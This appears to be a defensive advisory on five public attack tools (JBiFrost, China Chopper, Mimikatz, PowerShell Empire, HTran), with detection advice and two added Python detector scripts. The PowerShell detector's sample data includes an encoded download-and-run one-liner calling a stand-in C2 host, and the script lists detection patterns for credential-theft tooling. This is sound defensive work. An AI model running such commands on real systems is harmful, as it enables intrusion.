
Publicly Available Tools Seen in Cyber Incidents Worldwide

Remote Access Trojan: JBiFrost

First observed in May 2015, the JBiFrost RAT is a variant of the Adwind RAT, with roots stretching back to the Frutas RAT from 2012.

A RAT is a programme that, once installed on a victim’s machine, allows remote administrative control. In a malicious context, it can—among many other functions—be used to install backdoors and key loggers, take screen shots, and exfiltrate data.

Malicious RATs can be hard to detect because they are usually designed not to appear in lists of running programs and can mimic the behaviour of legitimate applications.

To prevent forensic analysis, RATs have been known to disable security measures (e.g., Task Manager) and network analysis tools (e.g., Wireshark) on the victim’s system.


In Use

JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors.

Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors.

Threat actors have repeatedly compromised servers in our countries with the purpose of delivering malicious RATs to victims, either to gain remote access for further exploitation, or to steal valuable information such as banking credentials, intellectual property, or PII.


Capabilities

JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X, and Android.

JBiFrost RAT allows threat actors to pivot and move laterally across a network or install additional malicious software. It is primarily delivered through emails as an attachment, usually an invoice notice, request for quotation, remittance notice, shipment notification, payment notice, or with a link to a file hosting service.

Past infections have exfiltrated intellectual property, banking credentials, and personally identifiable information (PII). Machines infected with JBiFrost RAT can also be used in botnets to carry out distributed denial-of-service attacks.


Examples

Since early 2018, we have observed an increase in JBiFrost RAT being used in targeted attacks against critical national infrastructure owners and their supply chain operators. There has also been an increase in the RAT’s hosting on infrastructure located in our countries.

In early 2017, Adwind RAT was deployed via spoofed emails designed to look as if they originated from Society for Worldwide Interbank Financial Telecommunication, or SWIFT, network services.

Many other publicly available RATs, including variations of Gh0st RAT, have also been observed in use against a range of victims worldwide.


Detection and Protection

Some possible indications of a JBiFrost RAT infection can include, but are not limited to:

  • Inability to restart the computer in safe mode,

  • Inability to open the Windows Registry Editor or Task Manager,

  • Significant increase in disk activity and/or network traffic,

  • Connection attempts to known malicious Internet Protocol (IP) addresses, and

  • Creation of new files and directories with obfuscated or random names.

Protection is best afforded by ensuring systems and installed applications are all fully patched and updated. The use of a modern antivirus programme with automatic definition updates and regular system scans will also help ensure that most of the latest variants are stopped in their tracks. You should ensure that your system is able to collect antivirus detections centrally across its estate and investigate RAT detections efficiently.

Strict application whitelisting is recommended to prevent infections from occurring.

The initial infection mechanism for RATs, including JBiFrost RAT, can be via phishing emails. You can help prevent JBiFrost RAT infections by stopping these phishing emails from reaching your users, helping users to identify and report phishing emails, and implementing security controls so that the malicious email does not compromise your device. The UK National Cyber Security Centre (UK NCSC) has published phishing guidance.


Webshell: China Chopper

China Chopper is a publicly available, well-documented webshell that has been in widespread use since 2012.

Webshells are malicious scripts that are uploaded to a target host after an initial compromise and grant a threat actor remote administrative capability.

Once this access is established, webshells can also be used to pivot to additional hosts within a network.


In Use

China Chopper is extensively used by threat actors to remotely access compromised web servers, where it provides file and directory management, along with access to a virtual terminal on the compromised device.

As China Chopper is just 4 KB in size and has an easily modifiable payload, detection and mitigation are difficult for network defenders.


Capabilities

China Chopper has two main components: the China Chopper client-side, which is run by the attacker, and the China Chopper server, which is installed on the victim web server but is also attacker-controlled.

The webshell client can issue terminal commands and manage files on the victim server. Its MD5 hash is publicly available (originally posted on hxxp://www.maicaidao.com).

The MD5 hash of the web client is shown in table 1 below.

Table 1: China Chopper webshell client MD5 hash

  Webshell Client    MD5 Hash
  caidao.exe         5001ef50c7e869253a7c152a638eab8a

The webshell server is uploaded in plain text and can easily be changed by the attacker. This makes it harder to define a specific hash that can identify adversary activity. In summer 2018, threat actors were observed targeting public-facing web servers that were vulnerable to CVE-2017-3066. The activity was related to a vulnerability in the web application development platform Adobe ColdFusion, which enabled remote code execution.

China Chopper was intended as the second-stage payload, delivered once servers had been compromised, allowing the threat actor remote access to the victim host. After successful exploitation of a vulnerability on the victim machine, the text-based China Chopper is placed on the victim web server. Once uploaded, the webshell server can be accessed by the threat actor at any time using the client application. Once successfully connected, the threat actor proceeds to manipulate files and data on the web server.

China Chopper’s capabilities include uploading and downloading files to and from the victim using the file-retrieval tool wget to download files from the internet to the target; and editing, deleting, copying, renaming, and even changing the timestamp, of existing files.


Detection and protection

The most powerful defense against a webshell is to avoid the web server being compromised in the first place. Ensure that all the software running on public-facing web servers is up-to-date with security patches applied. Audit custom applications for common web vulnerabilities.[6]

One attribute of China Chopper is that every action generates a hypertext transfer protocol (HTTP) POST. This can be noisy and is easily spotted if investigated by a network defender.

While the China Chopper webshell server upload is plain text, commands issued by the client are Base64 encoded, although this is easily decodable.

The adoption of Transport Layer Security (TLS) by web servers has resulted in web server traffic becoming encrypted, making detection of China Chopper activity using network-based tools more challenging.

The most effective way to detect and mitigate China Chopper is on the host itself—specifically on public-facing web servers. There are simple ways to search for the presence of the web-shell using the command line on both Linux and Windows based operating systems.[7]

To detect webshells more broadly, network defenders should focus on spotting either suspicious process execution on web servers (e.g., Hypertext Preprocessor [PHP] binaries spawning processes) or out-of-pattern outbound network connections from web servers. Typically, web servers make predictable connections to an internal network. Changes in those patterns may indicate the presence of a web shell. You can manage network permissions to prevent web-server processes from writing to directories where PHP can be executed, or from modifying existing files.

We also recommend that you use web access logs as a source of monitoring, such as through traffic analytics. Unexpected pages or changes in traffic patterns can be early indicators.


Credential Stealer: Mimikatz

Developed in 2007, Mimikatz is mainly used by attackers to collect the credentials of other users, who are logged into a targeted Windows machine. It does this by accessing the credentials in memory within a Windows process called Local Security Authority Subsystem Service (LSASS).

These credentials, either in plain text, or in hashed form, can be reused to give access to other machines on a network.

Although it was not originally intended as a hacking tool, in recent years Mimikatz has been used by multiple actors for malicious purposes. Its use in compromises around the world has prompted organizations globally to re-evaluate their network defenses.

Mimikatz is typically used by threat actors once access has been gained to a host and the threat actor wishes to move throughout the internal network. Its use can significantly undermine poorly configured network security.


In Use

Mimikatz source code is publicly available, which means anyone can compile their own versions of the new tool and potentially develop new Mimikatz custom plug-ins and additional functionality.

Our cyber authorities have observed widespread use of Mimikatz among threat actors, including organized crime and state-sponsored groups.

Once a threat actor has gained local administrator privileges on a host, Mimikatz provides the ability to obtain the hashes and clear-text credentials of other users, enabling the threat actor to escalate privileges within a domain and perform many other post-exploitation and lateral movement tasks.

For this reason, Mimikatz has been bundled into other penetration testing and exploitation suites, such as PowerShell Empire and Metasploit.


Capabilities

Mimikatz is best known for its ability to retrieve clear text credentials and hashes from memory, but its full suite of capabilities is extensive.

The tool can obtain Local Area Network Manager and NT LAN Manager hashes, certificates, and long-term keys on Windows XP (2003) through Windows 8.1 (2012r2). In addition, it can perform pass-the-hash or pass-the-ticket tasks and create Kerberos “golden tickets.”

Many features of Mimikatz can be automated with scripts, such as PowerShell, allowing a threat actor to quickly exploit and traverse a compromised network. Furthermore, when operating in memory through the freely available “Invoke-Mimikatz” PowerShell script, Mimikatz activity is very difficult to isolate and identify.


Examples

Mimikatz has been used across multiple incidents by a broad range of threat actors for several years. In 2011, it was used by unknown threat actors to obtain administrator credentials from the Dutch certificate authority, DigiNotar. The rapid loss of trust in DigiNotar led to the company filing for bankruptcy within a month of this compromise.

More recently, Mimikatz was used in conjunction with other malicious tools—in the NotPetya and BadRabbit ransomware attacks in 2017 to extract administrator credentials held on thousands of computers. These credentials were used to facilitate lateral movement and enabled the ransomware to propagate throughout networks, encrypting the hard drives of numerous systems where these credentials were valid.

In addition, a Microsoft research team identified use of Mimikatz during a sophisticated cyberattack targeting several high-profile technology and financial organizations. In combination with several other tools and exploited vulnerabilities, Mimikatz was used to dump and likely reuse system hashes.


Detection and Protection

Updating Windows will help reduce the information available to a threat actor from the Mimikatz tool, as Microsoft seeks to improve the protection offered in each new Windows version.

To prevent Mimikatz credential retrieval, network defenders should disable the storage of clear text passwords in LSASS memory. This is default behaviour for Windows 8.1/Server 2012 R2 and later, but can be specified on older systems which have the relevant security patches installed.[8] Windows 10 and Windows Server 2016 systems can be protected by using newer security features, such as Credential Guard.

Credential Guard will be enabled by default if:

  • The hardware meets Microsoft’s Windows Hardware Compatibility Program Specifications and Policies for Windows Server 2016 and Windows Server Semi-Annual Branch; and

  • The server is not acting as a Domain Controller.

You should verify that your physical and virtualized servers meet Microsoft’s minimum requirements for each release of Windows 10 and Windows Server.

Password reuse across accounts, particularly administrator accounts, makes pass-the-hash attacks far simpler. You should set user policies within your system that discourage password reuse, even across common level accounts on a network. The freely available Local Administrator Password Solution from Microsoft can allow easy management of local administrator passwords, preventing the need to set and store passwords manually.

Network administrators should monitor and respond to unusual or unauthorized account creation or authentication to prevent Kerberos ticket exploitation, or network persistence and lateral movement. For Windows, tools such as Microsoft Advanced Threat Analytics and Azure Advanced Threat Protection can help with this.

Network administrators should ensure that systems are patched and up-to-date. Numerous Mimikatz features are mitigated or significantly restricted by the latest system versions and updates. But no update is a perfect fix, as Mimikatz is continually evolving and new third-party modules are often developed.

Most up-to-date antivirus tools will detect and isolate non-customized Mimikatz use and should therefore be used to detect these instances. But threat actors can sometimes circumvent antivirus systems by running Mimikatz in memory, or by slightly modifying the original code of the tool. Wherever Mimikatz is detected, you should perform a rigorous investigation, as it almost certainly indicates a threat actor is actively present in the network, rather than an automated process at work.

Several of Mimikatz’s features rely on exploitation of administrator accounts. Therefore, you should ensure that administrator accounts are issued on an as-required basis only. Where administrative access is required, you should apply privileged access management principles.

Since Mimikatz can only capture the accounts of those users logged into a compromised machine, privileged users (e.g., domain administrators) should avoid logging into machines with their privileged credentials. Detailed information on securing Active Directory is available from Microsoft.[9]

Network defenders should audit the use of scripts, particularly PowerShell, and inspect logs to identify anomalies. This will assist in identifying Mimikatz or pass-the-hash abuse, as well as in providing some mitigation against attempts to bypass detection software.


Lateral Movement Framework: PowerShell Empire

PowerShell Empire is an example of a post-exploitation or lateral movement tool. It is designed to allow an attacker (or penetration tester) to move around a network after gaining initial access. Other examples of these tools include Cobalt Strike and Metasploit. PowerShell Empire can also be used to generate malicious documents and executables for social engineering access to networks.

The PowerShell Empire framework was designed as a legitimate penetration testing tool in 2015. PowerShell Empire acts as a framework for continued exploitation once a threat actor has gained access to a system.

The tool provides a threat actor with the ability to escalate privileges, harvest credentials, exfiltrate information, and move laterally across a network. These capabilities make it a powerful exploitation tool. Because it is built on a common legitimate application (PowerShell) and can operate almost entirely in memory, PowerShell Empire can be difficult to detect on a network using traditional antivirus tools.


In Use

PowerShell Empire has become increasingly popular among hostile state actors and organized criminals. In recent years we have seen it used in cyber incidents globally across a wide range of sectors.

Initial exploitation methods vary between compromises, and threat actors can configure the PowerShell Empire uniquely for each scenario and target. This, in combination with the wide range of skill and intent within the PowerShell Empire user community, means that the ease of detection will vary. Nonetheless, having a greater understanding and awareness of this tool is a step forward in defending against its use by threat actors.


Capabilities

PowerShell Empire enables a threat actor to carry out a range of actions on a victim’s machine and implements the ability to run PowerShell scripts without needing powershell.exe to be present on the system. Its communications are encrypted and its architecture is flexible.

PowerShell Empire uses “modules” to perform more specific malicious actions. These modules provide the threat actor with a customizable range of options to pursue their goals on the victim’s systems. These goals include escalation of privileges, credential harvesting, host enumeration, keylogging, and the ability to move laterally across a network.

PowerShell Empire’s ease of use, flexible configuration, and ability to evade detection make it a popular choice for threat actors of varying abilities.


Examples

During an incident in February 2018, a UK energy sector company was compromised by an unknown threat actor. This compromise was detected through PowerShell Empire beaconing activity using the tool’s default profile settings. Weak credentials on one of the victim’s administrator accounts are believed to have provided the threat actor with initial access to the network.

In early 2018, an unknown threat actor used Winter Olympics-themed socially engineered emails and malicious attachments in a spear-phishing campaign targeting several South Korean organizations. This attack had an additional layer of sophistication, making use of Invoke-PSImage, a steganographic tool that will encode any PowerShell script into an image.

In December 2017, APT19 targeted a multinational law firm with a phishing campaign. APT19 used obfuscated PowerShell macros embedded within Microsoft Word documents generated by PowerShell Empire.

Our cybersecurity authorities are also aware of PowerShell Empire being used to target academia. In one reported instance, a threat actor attempted to use PowerShell Empire to gain persistence using a Windows Management Instrumentation event consumer. However, in this instance, the PowerShell Empire agent was unsuccessful in establishing network connections due to the HTTP connections being blocked by a local security appliance.


Detection and Protection

Identifying malicious PowerShell activity can be difficult due to the prevalence of legitimate PowerShell activity on hosts and the increased use of PowerShell in maintaining a corporate environment.

To identify potentially malicious scripts, PowerShell activity should be comprehensively logged. This should include script block logging and PowerShell transcripts.

Older versions of PowerShell should be removed from environments to ensure that they cannot be used to circumvent additional logging and controls added in more recent versions of PowerShell. This page provides a good summary of PowerShell security practices.[10]

The code integrity features in recent versions of Windows can be used to limit the functionality of PowerShell, preventing or hampering malicious PowerShell in the event of a successful intrusion.

A combination of script code signing, application whitelisting, and constrained language mode will prevent or limit the effect of malicious PowerShell in the event of a successful intrusion. These controls will also affect legitimate PowerShell scripts and it is strongly advised that they be thoroughly tested before deployment.

When organizations profile their PowerShell usage, they often find it is only used legitimately by a small number of technical staff. Establishing the extent of this legitimate activity will make it easier to monitor and investigate suspicious or unexpected PowerShell usage elsewhere on the network.
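The Mimikatz section's advice to audit PowerShell and inspect logs for anomalies, and the script block logging and usage-profiling guidance here, come together in a triage step over the logged script blocks. The following is an added example written for this page, not code from the advisory or from either tool; it assumes script block log events have already been exported as dicts with user, host and script_block fields, and the indicator list, field names and sample events are constructed.

```python
"""Triage of PowerShell script block log events for Mimikatz and Empire-style
activity. Added example, not code from the advisory. Assumes script block
logging is enabled and events are available as dicts; indicator patterns,
field names, and sample events are constructed for this example.
"""
import base64
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# A -EncodedCommand argument: Base64 of the UTF-16LE script text.
ENCODED_ARG_RE = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

# Assumed indicators: the Invoke-Mimikatz script named in the text, Mimikatz's
# module::command syntax, download-and-run one-liners as used by Empire-style
# stagers, and any encoded command line at all.
INDICATORS = {
    "invoke_mimikatz": re.compile(r"Invoke-Mimikatz", re.IGNORECASE),
    "mimikatz_module": re.compile(r"\b(sekurlsa|lsadump|kerberos)::", re.IGNORECASE),
    "download_exec": re.compile(
        r"\b(IEX|Invoke-Expression)\b.{0,80}?(DownloadString|DownloadData)",
        re.IGNORECASE | re.DOTALL,
    ),
    "encoded_command": ENCODED_ARG_RE,
}


def decode_encoded_command(text: str) -> Optional[str]:
    """Decode a -EncodedCommand argument if one is present, else None."""
    m = ENCODED_ARG_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_event(event: Dict[str, str]) -> List[str]:
    """Return the indicator names that fire on one script block event.

    The encoded form is decoded first so that indicators hidden inside an
    -EncodedCommand argument are matched as well as plain-text ones.
    """
    text = event["script_block"]
    inner = decode_encoded_command(text)
    if inner:
        text = text + "\n" + inner
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def triage(events: List[Dict[str, str]]) -> Tuple[Counter, List[Dict[str, object]]]:
    """Flag events with indicators and count script blocks per user, so the
    small set of legitimate PowerShell users stands out from the rest."""
    per_user: Counter = Counter(e["user"] for e in events)
    flagged: List[Dict[str, object]] = []
    for e in events:
        hits = scan_event(e)
        if hits:
            flagged.append({"user": e["user"], "host": e["host"], "indicators": hits,
                            "decoded": decode_encoded_command(e["script_block"])})
    return per_user, flagged


def _utf16_b64(command: str) -> str:
    """Build an -EncodedCommand value for the constructed sample below."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample events: routine administration by a deployment account
# and two suspicious blocks from a workstation user.
SAMPLE_EVENTS = [
    {"user": "svc-deploy", "host": "build01", "script_block": "Get-Service | Where-Object Status -eq 'Running'"},
    {"user": "svc-deploy", "host": "build01", "script_block": "Copy-Item .\\release\\* \\\\fileserver\\drop\\"},
    {"user": "svc-deploy", "host": "build02", "script_block": "Restart-Service spooler"},
    {"user": "bob", "host": "ws-0042", "script_block": "Import-Module C:\\Users\\bob\\Invoke-Mimikatz.ps1; Invoke-Mimikatz"},
    {"user": "bob", "host": "ws-0042", "script_block": "powershell.exe -NoP -W Hidden -Enc "
     + _utf16_b64("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/launcher')")},
]

if __name__ == "__main__":
    counts, alerts = triage(SAMPLE_EVENTS)
    print(counts)
    for a in alerts:
        print(a["user"], a["host"], a["indicators"], a["decoded"])
```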


C2 Obfuscation and Exfiltration: HUC Packet Transmitter

Attackers will often want to disguise their location when compromising a target. To do this, they may use generic privacy tools (e.g., Tor) or more specific tools to obfuscate their location.

HUC Packet Transmitter (HTran) is a proxy tool used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker’s communications with victim networks. The tool has been freely available on the internet since at least 2009.

HTran facilitates TCP connections between the victim and a hop point controlled by a threat actor. Malicious threat actors can use this technique to redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts in a network.


In Use

The use of HTran has been regularly observed in compromises of both government and industry targets.

A broad range of threat actors have been observed using HTran and other connection proxy tools to

  • Evade intrusion and detection systems on a network,

  • Blend in with common traffic or leverage domain trust relationships to bypass security controls,

  • Obfuscate or hide C2 infrastructure or communications, and

  • Create peer-to-peer or meshed C2 infrastructure to evade detection and provide resilient connections to infrastructure.


Capabilities

HTran can run in several modes, each of which forwards traffic across a network by bridging two TCP sockets. They differ in terms of where the TCP sockets are initiated from, either locally or remotely. The three modes are

  • Server (listen) – Both TCP sockets initiated remotely;

  • Client (slave) – Both TCP sockets initiated locally; and

  • Proxy (tran) – One TCP socket initiated remotely, the other initiated locally, upon receipt of traffic from the first connection.

HTran can inject itself into running processes and install a rootkit to hide network connections from the host operating system. Using these features also creates Windows registry entries to ensure that HTran maintains persistent access to the victim network.


Examples

Recent investigations by our cybersecurity authorities have identified the use of HTran to maintain and obfuscate remote access to targeted environments.

In one incident, the threat actor compromised externally-facing web servers running outdated and vulnerable web applications. This access enabled the upload of webshells, which were then used to deploy other tools, including HTran.

HTran was installed into the ProgramData directory and other deployed tools were used to reconfigure the server to accept Remote Desktop Protocol (RDP) communications.

The threat actor issued a command to start HTran as a client, initiating a connection to a server located on the internet over port 80, which forwards RDP traffic from the local interface.

In this case, HTTP was chosen to blend in with other traffic that was expected to be seen originating from a web server to the internet. Other well-known ports used included:

  • Port 53 – Domain Name System

  • Port 443 – HTTP over TLS/Secure Sockets Layer

  • Port 3306 – MySQL

By using HTran in this way, the threat actor was able to use RDP for several months without being detected.


Detection and Protection

Attackers need access to a machine to install and run HTran, so network defenders should apply security patches and use good access control to prevent attackers from installing malicious applications.

Network monitoring and firewalls can help prevent and detect unauthorized connections from tools such as HTran.

In some of the samples analyzed, the rootkit component of HTran only hides connection details when the proxy mode is used. When client mode is used, defenders can view details about the TCP connections being made.

HTran also includes a debugging condition that is useful for network defenders. In the event that a destination becomes unavailable, HTran generates an error message using the following format:

sprintf(buffer, "[SERVER]connection to %s:%d error\r\n", host, port2);

This error message is relayed to the connecting client in the clear. Network defenders can monitor for this error message to potentially detect HTran instances active in their environments.
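Because the message is relayed in the clear in a fixed format, it can be matched directly in captured TCP payloads. The following is an added example written for this page, not code from the advisory or from HTran itself; the regex is derived from the sprintf format above, and the flow records and payloads are constructed, with the error message deliberately split across two segments to show why payloads are reassembled per flow before matching.

```python
"""Detect the HTran failure message in captured TCP payloads.

Added example, not code from the advisory. Derived from the format
"[SERVER]connection to %s:%d error\r\n" quoted in the text; flow records
and payloads below are constructed.
"""
import re
from typing import Dict, List, Optional

# Host is whatever %s printed (IP or hostname, no whitespace or colon);
# port is the %d value. The trailing CRLF is part of the format string.
HTRAN_ERROR_RE = re.compile(rb"\[SERVER\]connection to ([^\s:]+):(\d{1,5}) error\r\n")


def parse_htran_error(payload: bytes) -> Optional[Dict[str, object]]:
    """Return the unreachable destination named in an HTran error, if present."""
    m = HTRAN_ERROR_RE.search(payload)
    if not m:
        return None
    return {"host": m.group(1).decode("ascii", "replace"), "port": int(m.group(2))}


def scan_flows(flows: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Scan flow records of the form {"src", "dst", "segments": [bytes, ...]}.

    Segments are concatenated in order per flow, so a message that straddles
    two TCP segments is still matched. Returns one alert per flow that
    carried the message, naming the endpoints and the failed destination.
    """
    alerts: List[Dict[str, object]] = []
    for flow in flows:
        data = b"".join(flow["segments"])
        hit = parse_htran_error(data)
        if hit:
            alerts.append({"src": flow["src"], "dst": flow["dst"], **hit})
    return alerts


# Constructed sample flows: ordinary outbound HTTP from a web server, and a
# flow from the same server to an external client carrying the relayed error
# for an internal RDP destination, split across two segments.
SAMPLE_FLOWS = [
    {"src": "192.0.2.10", "dst": "198.51.100.20:80",
     "segments": [b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"]},
    {"src": "192.0.2.10", "dst": "203.0.113.7:51822",
     "segments": [b"[SERVER]connection to 10.0.0.5:", b"3389 error\r\n"]},
]

if __name__ == "__main__":
    for alert in scan_flows(SAMPLE_FLOWS):
        print(alert)
```

The external endpoint in such an alert is the connecting client the text describes, and the named host and port reveal where the hop was trying to forward traffic inside the network.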

